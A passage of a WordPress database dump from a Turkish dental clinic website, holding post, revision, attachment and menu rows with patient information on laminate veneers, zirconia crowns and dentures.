(6342, 1, '2018-07-13 18:12:21', '2018-07-13 15:12:21', '[vc_row][vc_column][vc_column_text]<strong>Laminate Veneer (lamine diş)</strong>\r\n\r\nLaminate veneer (laminant-laminat) Diş kaplamaları temel olarak, renk değişikliklerinin giderilmesi ve belli bir dereceye kadar şekil düzeltilmesi amacıyla yapılabilirler.\r\nBaşlıca uygulama alanları şu şekilde özetlenebilir:\r\nRenklenmelerde, bleaching (diş beyazlatma) gibi metotlarla sonuç alınmayan ileri derecedeki antibiyotik, flor vb.. lekelerinde kalıtsal yapı ve renk bozukluklarında,\r\n<ul>\r\n 	<li>Ayrık dişleri bitiştirmede (diastema kapama),</li>\r\n 	<li>Kırık veya aşınmış dişlerin restorasyonunda,</li>\r\n 	<li>Rengi ve yapısı bozulmuş eski dolguların düzeltilmesinde,</li>\r\n 	<li>Çapraşık ve eğri dişlerin düzeltilmesinde (ortodontik tedavi alternatifi olarak)mükemmele yakın kozmetik bir alternatif olabilir.</li>\r\n 	<li>Aralıklı dişlerin (diastema) laminate ile tedavisi</li>\r\n</ul>\r\n<strong>Laminate Veneer’in avantajları</strong>\r\n\r\nÇürük, aşınma, kırık veya yapısal anomalilerden dolayı, kendinizden emin bir şekilde gülümseyemediğiniz durumlarda dişlerinize bu metotla doğal bir güzellik kazandırmak mümkündür. Daha önceleri bu gibi olumsuz durumlarda dolgular ve tam kaplamalar tek çözüm iken günümüzde laminat tedavisi gibi yeni alternatifler mevcuttur.\r\n\r\n<strong>Bu uygulama ile;</strong>\r\n<ul>\r\n 	<li>Küçük bir müdahale ile çok kısa sürede sağlıklı ve doğal bir görünüş elde edilir.</li>\r\n 	<li>Dişinizde sadece, tırnak genişliğinde bir yuva açılması (ki bu da her zaman gerekmeyebilir) yeterlidir.</li>\r\n 	<li>Sağlam, renkleri bozulmayan ve dayanıklı malzemelerden üretilirler.</li>\r\n 	<li>Dişlerinizin doğal yapısı bozulmadan istediğiniz estetik özelliklere sahip olması sadece Laminate Veneer ile mümkündür. Diş üzerinde ya hiç bir değişiklik yapılmaz ya da az bir düzeltme ile sonucun daha mükemmel olması sağlanabilir. Zaten diş üzerinden kaldırılan miktar 0,3-0,7 mm ile sınırlı olmakta, böylece hiç bir dişin kesilmesine (küçültülmesine) gerek kalmamaktadır.</li>\r\n 	<li>Tedavinin laboratuar aşaması sadece 3-4 gündür. Ancak gülümseme tasarımında bu süre sonunda dudaklarınızın yeni görünümünüze uyum sağlaması 3-4 haftayı bulabilmektedir. Bu uyum süresince bazı dudak egzersizleri ve okuma tavsiye etmekteyiz. Bu süre sonunda yüzünüzle tamamen bütünleşmiş ve yapay olduğu kesinlikle fark edilmeyen yeni dişlerinizle rahatlıkla gülümseyebilirsiniz.</li>\r\n 	<li>Görünümünden memnun olmadığınız dişlerinizin bir kopyası elde edilerek üzerinde bir tasarım yapılabilir. Yani dişlerinize hiçbir müdahalede bulunmadan önce dişlerinizde oluşacak değişikliği görebilirsiniz.</li>\r\n 	<li>Porselen yüzeyleri son derece pürüzsüz olacağı için sigara ve benzeri sebeplerden kaynaklanan lekelenmeleri ve diş taşı oluşumlarını minimuma indirir.</li>\r\n 	<li>Kahve, çay, sigara gibi dış etkenlerle renk değiştirmez.</li>\r\n 	<li>Materyal olarak oldukça kırılgandır. Fakat mineye tam olarak yapıştırıldığında, germe ve çekme kuvvetlerine karşı direnci çok yükselir. Sözgelimi, yapışmış bir Veneer’i dişten bütün olarak sökmek mümkün değildir. Ancak elmas frezlerle diş yüzeyinden aşındırarak uzaklaştırılabilir.</li>\r\n 	<li>Aşınmaya karşı direnci yüksektir.</li>\r\n</ul>\r\n<strong>Laminate Veneer’in dezavantajları</strong>\r\n<ul>\r\n 	<li>Diğer restorasyonlara göre sağlık açısından üstünlükleri vardır. Ancak diğerlerine kıyasla biraz daha pahalı bir sistemdir.</li>\r\n 	<li>Hassas bir tekniktir. İyi bir klinik ve laboratuar çalışması gerektirir. Hekimin ve diş teknisyeninin bu konu üzerine teknik bilgisinin ve sanat yeteneğinin tam olması gerekir.</li>\r\n</ul>\r\n<strong>Laminate tedavinin uygulama aşamaları</strong>\r\n\r\nÖncelikle dişiniz işleme hazırlanır, üzerindeki artıklar temizlenir. Ardından dişinizin tam bir kopyasını elde etmek için ölçü alınır. Porselen malzemeden dişinize yapıştırılacak olan tabaka hazırlanır. Son olarak da, adeziv sistemlerde (bonding) olduğu gibi, lamineler de mevcut dişin yüzeyine rezinle (yapıştırıcı bir ara madde) kaynaştırılır.\r\n\r\nHer yaş grubundaki kişiler laminat tedavisinden yararlanabilir. Ancak, çene bozuklukları, tırnak yeme, kalem ısırma gibi kötü alışkanlıklar ileri derecede dişeti tahribatlarının mevcut olduğu durumlarda uygulanmaz. Buna en iyi karar verecek olan diş hekiminizdir.\r\n\r\nLaminateler iyi bir ağız bakımıyla yıllarca sorunsuz olarak kullanılabilirler. Çünkü diğer adeziv sistemlerden (bonding) daha üstün özelliklere sahip porselenden imal edilmişlerdir. Lekelenme ve aşınmaya karşı daha dirençlidirler. Ömürlerini uzatmak için ağız bakımına dikkat etmek gerekir. Ayrıca, çok sert gıdaları ısırmaktan, tırnak yemek gibi kötü alışkanlıklardan kaçınmak gerekir.[/vc_column_text][/vc_column][/vc_row]', 'Lamine Diş Kaplamaları', '', 'inherit', 'closed', 'closed', '', '6340-revision-v1', '', '', '2018-07-13 18:12:21', '2018-07-13 15:12:21', '', 6340, 'http://www.ze-dent.com/6340-revision-v1/', 0, 'revision', '', 0),
(6343, 1, '2018-07-13 18:16:42', '2018-07-13 15:16:42', '[vc_row][vc_column][vc_column_text]<strong>Zirkon diş kaplamaları</strong>\r\n\r\n<img class=\"size-medium wp-image-6345 alignright\" src=\"http://www.ze-dent.com/wp-content/uploads/2018/07/zirkonyum-kaplama-300x203.jpeg\" alt=\"\" width=\"300\" height=\"203\" />Zirkon diş kaplaması, diş hekimliğinin temel gereksinimleri olan estetik, sağlamlık, doku uyumu ve doğallık konularında bugüne kadar ulaşılan en yüksek kaliteye sahip üründür.\r\n\r\nEstetik diş hekimliğinde her geçen gün metal alt yapılı porselenlerden uzaklaşılmaktadır. Biyolojik uyum, doğal görüntü, estetik ve mekanik direnç gibi istediğimiz tüm özelliklere sahip olan bu sistemde alt yapı olarak metal yerine beyaz bir alaşım olan ‘zirkonyum’ kullanılır.\r\n\r\nZirkonyum alt yapılı porselenleri hem ön dişlerde kullanabilecek kadar estetik olmaları, hem de arka dişlerde kullanılabilecek sağlam olmaları sebebiyle güvenle tercih etmekteyiz. Bu sistemler kişilerin yaşam kalitesini artırmaktadır.\r\n\r\n<strong>Zirkonyumun kullanım alanları</strong>\r\n<ul>\r\n 	<li>Beyazlatma gibi metotlarla sonuç alınmayan ileri derecedeki (antibiyotik, flor vb.) renkleşmelerde kalıtsal yapı renkleşmelerinde,</li>\r\n 	<li>Önceden dişleri kesilmiş kişilerde,</li>\r\n 	<li>Ayrık dişleri birleştirmede (diastema kapama),</li>\r\n 	<li>Ağzında metal destekli köprü –kuron(kaplama)olan kişilerde,</li>\r\n 	<li>Kırık dişlerin düzeltilmesinde,</li>\r\n 	<li>Rengi ve yapısı bozulmuş eski dolguların düzeltilmesinde,</li>\r\n 	<li>Çapraşık ve eğri dişlerin düzeltilmesinde (ortodontik tedavi alternatifi olarak),</li>\r\n 	<li>Dolgu yapılamayacak kadar aşırı madde kaybı olan dişlerde…</li>\r\n</ul>\r\n<strong>Zirkonyum diş kaplamalarının avantajları</strong>\r\n<ul>\r\n 	<li>Yalıtıcı özelliğiyle sıcak soğuk hassasiyeti gelişmez.</li>\r\n 	<li>Zirkonyum ışığı geçirdiklerinden doğal diş yapısına çok benzer estetik oluşturur, çok iyi yapılmış olan metal destekli porselenlerde bile bir matlık ve yapaylık vardır. Bu nedenle özellikle ön dişlerde ‘zirkonyum’ tercih edilir.</li>\r\n 	<li>Metal destekli porselenler bazı ışıklarda ağızda yokmuş gibi koyu renk bir boşluk görüntüsü verirler. Zirkonyum da ise aynı doğal diş gibi her türlü ışığı geçirirler.</li>\r\n 	<li>Metal destekli porselenler kuron–köprü (kaplamalar) mekanik olarak dişe yapıştırılırlar. Zirkonyum ise mekanik ve kimyasal olarak dişe tutturulur. Bu yüzden metal desteklilere göre tutuculukları çok daha yüksektir.</li>\r\n 	<li>Alt yapısında metal olmadığı için kuron-diş eti hizasında koyu renk bir çizgi olmaz. Daha estetik bir görüntü sağlanır.</li>\r\n 	<li>Porselen yüzeyleri son derece pürüzsüz olacağı için sigara ve benzeri sebeplerden kaynaklanan lekelenmeleri ve diş taşı oluşumlarını minimuma indirir.</li>\r\n 	<li>Kahve, çay, sigara gibi dış etkenlerle renk değiştirmez.</li>\r\n 	<li>Ağızda tat bozukluğuna, dişeti problemlerine ve ağız kokusuna yol açmayan sağlıklı bir materyaldir.</li>\r\n 	<li>Önceden yapılmış olan metal destekli porselen kuronlar nedeniyle dişetinde oluşan baskı ve morluklar zirkonyum (kaplamaların) kuronların uygulanmasıyla tamamen ortadan kalkar, estetik ve doğal bir görüntü elde edilir.</li>\r\n 	<li>Diş eti çekildiğinde, zirkonyum estetik görünümlerini korurken, metal destekli porselenler diş ile birleştikleri bölgede kötü bir görüntü oluştururlar.</li>\r\n 	<li>Alt yapıda kullanılan bazı metallere karşı (nikel vb.) oluşabilecek alerji riski zirkonyum alt yapılı porselenlerde yoktur.</li>\r\n 	<li>Vücudumuzla mükemmel uyum sağlandığı için diş eti hastalığı olan ya da diş eti hastalığına yatkın olan kişilerde rahatlıkla kullanılabilir. Diş etiyle uyumu çok iyidir ağız hijyenine önem verildiği takdirde diş eti problemi yaratmaz.</li>\r\n</ul>\r\n<strong>Zirkonyum diş kaplamasının uygulanması</strong>\r\n<ul>\r\n 	<li>Öncelikle anestezi yapılarak diş hazırlıkları yapılır ve dişlerinizden ölçü alınır. Bir sonraki aşamaya kadar estetik olarak diş yüzeylerinizin boş gözükmemesi için geçicileriniz yapılır ve bunlar diş yüzeylerine yapıştırılır. Bu ayrıca dişlerinizdeki olası hassasiyetleri de engeller.</li>\r\n 	<li>2. aşamada laboratuarda hazırlanan altyapı provayla diş eti uyumu kontrol edilir.</li>\r\n 	<li>Son aşamada da estetik prova yapılır. Yapıştırma işlemi öncesinde bir ya da iki seans, istenilen renkte hazırlanmış maketlerinizin dişlerinize ve yüzünüze uyumu kontrol edilerek bitim aşamasına geçilir. Ortalama tüm bu işlemler 7-10 gün içerisinde tamamlanır.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Zirkon Diş Kaplamaları', '', 'publish', 'closed', 'closed', '', 'zirkon-dis-kaplamalari', '', '', '2018-07-13 18:16:42', '2018-07-13 15:16:42', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6343', 0, 'us_portfolio', '', 0),
(6344, 1, '2018-07-13 18:13:35', '2018-07-13 15:13:35', '', 'zirkonyum-kaplama', '', 'inherit', 'closed', 'closed', '', 'zirkonyum-kaplama', '', '', '2018-07-13 18:13:35', '2018-07-13 15:13:35', '', 6343, 'http://www.ze-dent.com/wp-content/uploads/2018/07/zirkonyum-kaplama.jpg', 0, 'attachment', 'image/jpeg', 0),
(6345, 1, '2018-07-13 18:16:16', '2018-07-13 15:16:16', '', 'zirkonyum-kaplama', '', 'inherit', 'closed', 'closed', '', 'zirkonyum-kaplama-2', '', '', '2018-07-13 18:16:16', '2018-07-13 15:16:16', '', 6343, 'http://www.ze-dent.com/wp-content/uploads/2018/07/zirkonyum-kaplama.jpeg', 0, 'attachment', 'image/jpeg', 0),
(6346, 1, '2018-07-13 18:16:42', '2018-07-13 15:16:42', '[vc_row][vc_column][vc_column_text]<strong>Zirkon diş kaplamaları</strong>\r\n\r\n<img class=\"size-medium wp-image-6345 alignright\" src=\"http://www.ze-dent.com/wp-content/uploads/2018/07/zirkonyum-kaplama-300x203.jpeg\" alt=\"\" width=\"300\" height=\"203\" />Zirkon diş kaplaması, diş hekimliğinin temel gereksinimleri olan estetik, sağlamlık, doku uyumu ve doğallık konularında bugüne kadar ulaşılan en yüksek kaliteye sahip üründür.\r\n\r\nEstetik diş hekimliğinde her geçen gün metal alt yapılı porselenlerden uzaklaşılmaktadır. Biyolojik uyum, doğal görüntü, estetik ve mekanik direnç gibi istediğimiz tüm özelliklere sahip olan bu sistemde alt yapı olarak metal yerine beyaz bir alaşım olan ‘zirkonyum’ kullanılır.\r\n\r\nZirkonyum alt yapılı porselenleri hem ön dişlerde kullanabilecek kadar estetik olmaları, hem de arka dişlerde kullanılabilecek sağlam olmaları sebebiyle güvenle tercih etmekteyiz. Bu sistemler kişilerin yaşam kalitesini artırmaktadır.\r\n\r\n<strong>Zirkonyumun kullanım alanları</strong>\r\n<ul>\r\n 	<li>Beyazlatma gibi metotlarla sonuç alınmayan ileri derecedeki (antibiyotik, flor vb.) renkleşmelerde kalıtsal yapı renkleşmelerinde,</li>\r\n 	<li>Önceden dişleri kesilmiş kişilerde,</li>\r\n 	<li>Ayrık dişleri birleştirmede (diastema kapama),</li>\r\n 	<li>Ağzında metal destekli köprü –kuron(kaplama)olan kişilerde,</li>\r\n 	<li>Kırık dişlerin düzeltilmesinde,</li>\r\n 	<li>Rengi ve yapısı bozulmuş eski dolguların düzeltilmesinde,</li>\r\n 	<li>Çapraşık ve eğri dişlerin düzeltilmesinde (ortodontik tedavi alternatifi olarak),</li>\r\n 	<li>Dolgu yapılamayacak kadar aşırı madde kaybı olan dişlerde…</li>\r\n</ul>\r\n<strong>Zirkonyum diş kaplamalarının avantajları</strong>\r\n<ul>\r\n 	<li>Yalıtıcı özelliğiyle sıcak soğuk hassasiyeti gelişmez.</li>\r\n 	<li>Zirkonyum ışığı geçirdiklerinden doğal diş yapısına çok benzer estetik oluşturur, çok iyi yapılmış olan metal destekli porselenlerde bile bir matlık ve yapaylık vardır. Bu nedenle özellikle ön dişlerde ‘zirkonyum’ tercih edilir.</li>\r\n 	<li>Metal destekli porselenler bazı ışıklarda ağızda yokmuş gibi koyu renk bir boşluk görüntüsü verirler. Zirkonyum da ise aynı doğal diş gibi her türlü ışığı geçirirler.</li>\r\n 	<li>Metal destekli porselenler kuron–köprü (kaplamalar) mekanik olarak dişe yapıştırılırlar. Zirkonyum ise mekanik ve kimyasal olarak dişe tutturulur. Bu yüzden metal desteklilere göre tutuculukları çok daha yüksektir.</li>\r\n 	<li>Alt yapısında metal olmadığı için kuron-diş eti hizasında koyu renk bir çizgi olmaz. Daha estetik bir görüntü sağlanır.</li>\r\n 	<li>Porselen yüzeyleri son derece pürüzsüz olacağı için sigara ve benzeri sebeplerden kaynaklanan lekelenmeleri ve diş taşı oluşumlarını minimuma indirir.</li>\r\n 	<li>Kahve, çay, sigara gibi dış etkenlerle renk değiştirmez.</li>\r\n 	<li>Ağızda tat bozukluğuna, dişeti problemlerine ve ağız kokusuna yol açmayan sağlıklı bir materyaldir.</li>\r\n 	<li>Önceden yapılmış olan metal destekli porselen kuronlar nedeniyle dişetinde oluşan baskı ve morluklar zirkonyum (kaplamaların) kuronların uygulanmasıyla tamamen ortadan kalkar, estetik ve doğal bir görüntü elde edilir.</li>\r\n 	<li>Diş eti çekildiğinde, zirkonyum estetik görünümlerini korurken, metal destekli porselenler diş ile birleştikleri bölgede kötü bir görüntü oluştururlar.</li>\r\n 	<li>Alt yapıda kullanılan bazı metallere karşı (nikel vb.) oluşabilecek alerji riski zirkonyum alt yapılı porselenlerde yoktur.</li>\r\n 	<li>Vücudumuzla mükemmel uyum sağlandığı için diş eti hastalığı olan ya da diş eti hastalığına yatkın olan kişilerde rahatlıkla kullanılabilir. Diş etiyle uyumu çok iyidir ağız hijyenine önem verildiği takdirde diş eti problemi yaratmaz.</li>\r\n</ul>\r\n<strong>Zirkonyum diş kaplamasının uygulanması</strong>\r\n<ul>\r\n 	<li>Öncelikle anestezi yapılarak diş hazırlıkları yapılır ve dişlerinizden ölçü alınır. Bir sonraki aşamaya kadar estetik olarak diş yüzeylerinizin boş gözükmemesi için geçicileriniz yapılır ve bunlar diş yüzeylerine yapıştırılır. Bu ayrıca dişlerinizdeki olası hassasiyetleri de engeller.</li>\r\n 	<li>2. aşamada laboratuarda hazırlanan altyapı provayla diş eti uyumu kontrol edilir.</li>\r\n 	<li>Son aşamada da estetik prova yapılır. Yapıştırma işlemi öncesinde bir ya da iki seans, istenilen renkte hazırlanmış maketlerinizin dişlerinize ve yüzünüze uyumu kontrol edilerek bitim aşamasına geçilir. Ortalama tüm bu işlemler 7-10 gün içerisinde tamamlanır.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Zirkon Diş Kaplamaları', '', 'inherit', 'closed', 'closed', '', '6343-revision-v1', '', '', '2018-07-13 18:16:42', '2018-07-13 15:16:42', '', 6343, 'http://www.ze-dent.com/6343-revision-v1/', 0, 'revision', '', 0),
(6347, 1, '2018-07-13 18:18:05', '2018-07-13 15:18:05', ' ', '', '', 'publish', 'closed', 'closed', '', '6347', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6347', 21, 'nav_menu_item', '', 0),
(6348, 1, '2018-07-13 18:18:05', '2018-07-13 15:18:05', ' ', '', '', 'publish', 'closed', 'closed', '', '6348', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6348', 22, 'nav_menu_item', '', 0),
(6349, 1, '2018-07-13 18:18:06', '2018-07-13 15:18:06', ' ', '', '', 'publish', 'closed', 'closed', '', '6349', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6349', 23, 'nav_menu_item', '', 0),
(6350, 1, '2018-07-13 18:18:06', '2018-07-13 15:18:06', '', 'Inlay – Onlay Porselen Dolgular', '', 'publish', 'closed', 'closed', '', 'inlay-onlay-porselen-dolgular', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6350', 24, 'nav_menu_item', '', 0),
(6351, 1, '2018-07-13 18:18:06', '2018-07-13 15:18:06', ' ', '', '', 'publish', 'closed', 'closed', '', '6351', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6351', 25, 'nav_menu_item', '', 0),
(6352, 1, '2018-07-13 18:18:06', '2018-07-13 15:18:06', ' ', '', '', 'publish', 'closed', 'closed', '', '6352', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6352', 26, 'nav_menu_item', '', 0),
(6353, 1, '2018-07-13 18:23:30', '2018-07-13 15:23:30', '[vc_row][vc_column][vc_column_text]<strong>Protez</strong>\r\n\r\nDişlerin ve çevre dokuların çeşitli nedenlerle madde kaybına uğradığı ya da tamamen yok olduğu, yani kaybedildiği durumlarda, onları onarmak ya da yerine konması için kullanılan, hazırlanmış materyallere protez adı verilir.\r\n\r\n<strong>Protezlerin amacı nedir?</strong>\r\n\r\nProtez yapımıyla, hastanın kaybolan fonksiyonları tekrar kazandırılmaya çalışılırken, aynı zamanda bozulan konuşmasının da düzeltilmesi ve estetik görünümün de daha iyi olması amaçlanmaktadır. Böylelikle büyük oranda kaybedilen ağız sağlığı düzeltilirken toplum içinde eksik ya da harap olmuş dişlerle yaşamak zorunda kalan bireylerin psikolojik açıdan da desteklenmesi sağlanır.\r\n\r\nÇünkü bu şekilde yaşamlarını (bir süre de olsa) sürdürmek zorunda kalan bireyler, öncelikle gülmeyi unuturlar. Bu da fonksiyonel bozuklukların yanı sıra, insanlarda kendine güven duygusunun zedelenmesine neden olur.\r\n\r\nBu tip hastalara yapılan çeşitli protezlerle insanların yaşam kalitesinin yükseltilmesi amaçlanır\r\n\r\n<strong>Protez çeşitleri</strong>\r\n\r\nDişlerin kaybedilmesi sonucunda yapılan protezler genel anlamda iki çeşittir:\r\n<ul>\r\n 	<li>Sabit protezler</li>\r\n 	<li>Hareketli protezler</li>\r\n</ul>\r\n<strong>Sabit protezler</strong>\r\n\r\n<img class=\"size-medium wp-image-6355 alignright\" src=\"http://www.ze-dent.com/wp-content/uploads/2018/07/Sabit-Protez-Tedavisi-300x235.jpg\" alt=\"\" width=\"300\" height=\"235\" />Dişlerin ağızda görünen kısımlarının yerine yapılan ve hasta tarafından çıkarılamayan protezlerdir. Kaplama ya da porselen diş olarak da adlandırılabilirler.\r\n\r\nSabit protezler, Çürük veya başka bir nedenle aşırı madde kaybı olan dişlerin restorasyonunda, renklenmiş ve rengi geri döndürülemeyen dişlerde, şekil bozukluğu olan dişlerde yapılır. Dişler kaplama yapılacak şekilde biçimlendilir. Daha sonra ölçüsü alınıp laboratuarlarda hekiminizin yönlerdirmesi doğrultusunda hazırlanır. Provalar yapıldıktan sonra kaplamanız yapıştırılarak işlem bitirilir. Kaplamaların bakımı sağlıklı dişlerin bakımıyla aynı şekilde yapılmalıdır. İyi yapılmış bir kaplama fonksiyon açısından ve temizlenme açısından sağlıklı bir dişten farksız olmalıdır. Bu dişlerin yapımında porselen, değerli metal kombinasyonları, özel cam maddeler ve özel plastiklerden hekiminizin seçimi doğrultusunda yapılır.\r\n\r\nKöprüler ise eksik dişlerin yerine protez yapabilmek için komşu diğer dişlerden destek alınarak yapılan protezlerdir. Bu restorasyonların yapımında her iki komşu dişte aşındırmalar yapılır ve yapılan köpri tüm dişleri birbirine bağlar. Eksik dişlerin yerine köprü yapılmadığı taktirde hastanın komşu dişleri ve diğer çenedeki karşıt dişi, çekim boşluğuna doğru hareket eder. Bu nedenle bozulan diş kapanışı çürüklere ve diş kayıplarına yol açar. Kaplamada olduğu gibi diş hekiminiz tarafından destek olarak alınacak dişler şekillendirilip aynı işlemler gerçekleştirilerek yapılır. Kaplamalarınızın bakımı, rutin bakım işlemleri yanısıra boşluğa konulan parçanın alt kısmının özel Dental Pross’larla diş hekiminizin göstereceği şekilde temizlenerek yapılır.\r\n\r\n<strong>Hareketli protezler</strong>\r\n\r\n<img class=\"size-medium wp-image-6354 alignright\" src=\"http://www.ze-dent.com/wp-content/uploads/2018/07/Hareketli-Protez-Tedavisi-300x235.jpg\" alt=\"\" width=\"300\" height=\"235\" />Hareketli protez, sabit protez yapılamayacak durumdaki diş kayıplarının giderilmesi amacıyla yapılan protezlerdir. Sabit protezlerden farklı olarak takıp çıkarılabilirler. Özel plastik veya metal plastik kombinasyonlarından yapılırlar. Estetiği ve fonksiyonu sağlamak amacıyla yapılır. Hareketli protez gerektiren vakalarda çok fazla diş eksikliği bulunduğundan, çiğneme fonksiyonunun yerine getirilmesi ve diğer kalan dişlerin zarar görmemesi için yapılması gerekir. Hareketli protezler, dişlerin tamamen ya da büyük çoğunluğunun kaybedildiği durumlarda yapılır.\r\n\r\nHareketli protezler, özel plastikler ve metallerin kombinasyonu veya vakaya göre sadece özel plastiklerden yapılır. Hareketli protezlerde kullanılan dişler genelde plastik dişlerden seçilir. Porselen dişler ağırlıkları ve kuvvetleri yumuşak dokulara uygun olmayan şekilde ilettiğinden ve plastikle iyi bir bağlantı sağlayamayacağından tavsiye edilmemektedir. Hareketli protezlerin bakımı için her yemekten sonra çıkarılıp fırçalanmalıdır. Günde bir kere özel temizleyici maddelerle temizlenmelidir. Bazı maddeler metal içeren protezlere zarar verebileceğinden hekime danışılmadan kullanılmamalıdır. Kullanmadığınız zamanlarda protezinizi temiz bir suyun içinde tutarak su kaybedip bozulmasına engel olabilirsiniz. Hareketli protezinizi 3 yılda bir kontrol ettirip gerekiyorsa değiştirmeniz gerekmektedir. Zamanla protez aşınıp, kırılabilir veya çene ile uyumunu kaybedebilir. Bu da çene kemiğine zarar verebilir.\r\n\r\nHareketli protezlerde ilk 1 ay çiğneme ve konuşma fonksiyonlarının yerine getirilmesi açısından alışma devresidir. Ayrıca protezin oluşturabileceği uyumsuzluklar (vuruklar) yapılacak kontrollerle giderilmelidir.\r\n\r\nBir dişin kaybı sağlığınıza birçok şekilde zarar verebilir. Kaybedilen dişin önündeki ve arkasındaki dişler bu boşluğa doğru eğilirler. Karşıt diş de çekim boşluğuna doğru uzar. Çünkü dişler temas etme eğilimindedir. Bu uzama ve eğilmeler sonucunda dişlerin dizilimi ve birbirleriyle kontakları bozulur. Bu da dişler arasında gıda artığı ve bakteri plağı birikimini artırır. Bu bölgelerin temizlenmesi zordur ve ve bu nedenlede diş çürüğü ve dişeti hastalıklarının oluşması riski artar. Tüm bu sorunlar kaybedilen dişin yerine konmasıyla önlenebilir. Ancak kayıp dişin yerine konması komşu dişlerin eğilmesi ve karşıt dişin uzamasından sonra biraz daha zor olur.\r\n\r\nTüm bu metodların avantajları ve dezavantajları vardır. Diş hekiminiz hangi yöntemin size en uygun olduğuna karar verebilmeniz için en büyük yardımcınızdır.\r\n\r\nHareketli protezlerde protezin ağızdaki doğal dişlere tutunması için kullanılan metal kancalara “Kroşe” denir. Bir çok insan ağızlarında bu metallerin görünmesinden rahatsızlık duyar. Ancak gelişen diş hekimliği teknolojisi bize bu konuda çok daha estetik bir çözüm sunmaktadır. “Hassas Tutucu”lar yada ateleskop kronlar kullanılarak dişlere tutunması sağlanırken metal kroşe görüntüsünün estetiği bozması da önlenir.\r\n\r\n<strong>Hassas Tutucular</strong>\r\nHareketli protezlerde ‘kroşe’ olarak adlandırılan ve protezin tutuculuğunu sağlamak için kullanılan metal parçaların yerine kullanılan sisteme ‘hassas tutucu’ denir. Dişsiz bölgenin önündeki dişler kaplamadaki gibi işlemlerden geçirilerek hassas tutucuların sabit parçası bu dişlere yapılan kaplamaya sabit olacak şekilde döküm olarak yapılır. Hareketli parçada yapılacak olan hareketli protezde yer alır. Kroşeler dışında hareketli parça, hareketli protezde tarif edildiği şekilde yapılır. Hassas tutucular, estetik ve tutuculuğun daha iyi olması, kroşelerin yol açabileceği yiyecek birikimleri sonucu ortaya çıkacak çürük ve diğer problemlerin oluşmaması açısından daha çok tercih edilirler.[/vc_column_text][/vc_column][/vc_row]', 'Protez Tedavisi', '', 'publish', 'closed', 'closed', '', 'protez-tedavisi', '', '', '2018-07-18 20:41:16', '2018-07-18 17:41:16', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6353', 0, 'us_portfolio', '', 0),
(6354, 1, '2018-07-13 18:21:30', '2018-07-13 15:21:30', '', 'Hareketli-Protez-Tedavisi', '', 'inherit', 'closed', 'closed', '', 'hareketli-protez-tedavisi', '', '', '2018-07-13 18:21:30', '2018-07-13 15:21:30', '', 6353, 'http://www.ze-dent.com/wp-content/uploads/2018/07/Hareketli-Protez-Tedavisi.jpg', 0, 'attachment', 'image/jpeg', 0),
(6355, 1, '2018-07-13 18:21:34', '2018-07-13 15:21:34', '', 'Sabit-Protez-Tedavisi', '', 'inherit', 'closed', 'closed', '', 'sabit-protez-tedavisi', '', '', '2018-07-13 18:21:34', '2018-07-13 15:21:34', '', 6353, 'http://www.ze-dent.com/wp-content/uploads/2018/07/Sabit-Protez-Tedavisi.jpg', 0, 'attachment', 'image/jpeg', 0),
(6356, 1, '2018-07-13 18:23:14', '2018-07-13 15:23:14', '', 'protez-tedavi', '', 'inherit', 'closed', 'closed', '', 'protez-tedavi', '', '', '2018-07-13 18:23:14', '2018-07-13 15:23:14', '', 6353, 'http://www.ze-dent.com/wp-content/uploads/2018/07/protez-tedavi.jpg', 0, 'attachment', 'image/jpeg', 0),
(6357, 1, '2018-07-13 18:23:30', '2018-07-13 15:23:30', '[vc_row][vc_column][vc_column_text]<strong>Protez</strong>\r\n\r\nDişlerin ve çevre dokuların çeşitli nedenlerle madde kaybına uğradığı ya da tamamen yok olduğu, yani kaybedildiği durumlarda, onları onarmak ya da yerine konması için kullanılan, hazırlanmış materyallere protez adı verilir.\r\n\r\n<strong>Protezlerin amacı nedir?</strong>\r\n\r\nProtez yapımıyla, hastanın kaybolan fonksiyonları tekrar kazandırılmaya çalışılırken, aynı zamanda bozulan konuşmasının da düzeltilmesi ve estetik görünümün de daha iyi olması amaçlanmaktadır. Böylelikle büyük oranda kaybedilen ağız sağlığı düzeltilirken toplum içinde eksik ya da harap olmuş dişlerle yaşamak zorunda kalan bireylerin psikolojik açıdan da desteklenmesi sağlanır.\r\n\r\nÇünkü bu şekilde yaşamlarını (bir süre de olsa) sürdürmek zorunda kalan bireyler, öncelikle gülmeyi unuturlar. Bu da fonksiyonel bozuklukların yanı sıra, insanlarda kendine güven duygusunun zedelenmesine neden olur.\r\n\r\nBu tip hastalara yapılan çeşitli protezlerle insanların yaşam kalitesinin yükseltilmesi amaçlanır\r\n\r\n<strong>Protez çeşitleri</strong>\r\n\r\nDişlerin kaybedilmesi sonucunda yapılan protezler genel anlamda iki çeşittir:\r\n<ul>\r\n 	<li>Sabit protezler</li>\r\n 	<li>Hareketli protezler</li>\r\n</ul>\r\n<strong>Sabit protezler</strong>\r\n\r\n<img class=\"size-medium wp-image-6354 alignright\" src=\"http://www.ze-dent.com/wp-content/uploads/2018/07/Hareketli-Protez-Tedavisi-300x235.jpg\" alt=\"\" width=\"300\" height=\"235\" />Dişlerin ağızda görünen kısımlarının yerine yapılan ve hasta tarafından çıkarılamayan protezlerdir. Kaplama ya da porselen diş olarak da adlandırılabilirler.\r\n\r\nSabit protezler, Çürük veya başka bir nedenle aşırı madde kaybı olan dişlerin restorasyonunda, renklenmiş ve rengi geri döndürülemeyen dişlerde, şekil bozukluğu olan dişlerde yapılır. Dişler kaplama yapılacak şekilde biçimlendilir. Daha sonra ölçüsü alınıp laboratuarlarda hekiminizin yönlerdirmesi doğrultusunda hazırlanır. Provalar yapıldıktan sonra kaplamanız yapıştırılarak işlem bitirilir. Kaplamaların bakımı sağlıklı dişlerin bakımıyla aynı şekilde yapılmalıdır. İyi 